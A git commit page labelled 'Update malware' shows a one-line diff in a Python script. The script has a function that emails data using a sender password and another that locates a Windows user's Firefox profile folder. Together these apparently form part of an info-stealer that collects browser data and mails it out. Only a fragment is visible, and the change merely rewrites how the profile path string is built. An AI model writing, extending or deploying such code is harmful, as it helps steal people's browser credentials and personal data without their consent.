Update malware
This commit is contained in:
parent
21313f990b
commit
d1a05d481b
@ -61,7 +61,7 @@ def send_email(subject, body, sender, recipients, password):
|
||||
|
||||
def get_firefox_profiles(username):
|
||||
|
||||
path = f"C:\\Users\\{username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles"
|
||||
path = f"C:\\Users\\" + username + "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles"
|
||||
|
||||
try:
|
||||
profiles = [profile for profile in os.listdir(
|
||||
|
Loading…
Reference in New Issue
Block a user